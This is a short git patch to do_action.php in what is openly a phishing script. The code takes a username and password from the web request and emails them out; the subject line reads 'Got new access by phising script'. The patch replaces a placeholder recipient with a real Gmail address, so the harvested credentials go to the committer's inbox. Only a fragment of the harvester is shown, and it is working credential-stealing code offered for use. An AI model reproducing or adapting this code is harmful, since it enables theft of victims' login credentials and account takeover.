From 795c6ca54a5b701af6c1d24381a7325645e9ef24 Mon Sep 17 00:00:00 2001 From: Sxann <89704758+Sxann@users.noreply.github.com> Date: Sun, 29 Aug 2021 01:23:37 +0700 Subject: [PATCH] Update do_action.php --- do_action.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/do_action.php b/do_action.php index 25fa71a..c52438b 100644 --- a/do_action.php +++ b/do_action.php @@ -8,7 +8,7 @@ function mail_sender(){ $username = $_REQUEST['username']; $password = $_REQUEST['password']; - $reciever = "YOUR-EMAIL ADRRESS"; + $reciever = "sxannnn01@gmail.com"; $subject = "Got new access by phising script"; $message = "The username is ". $username;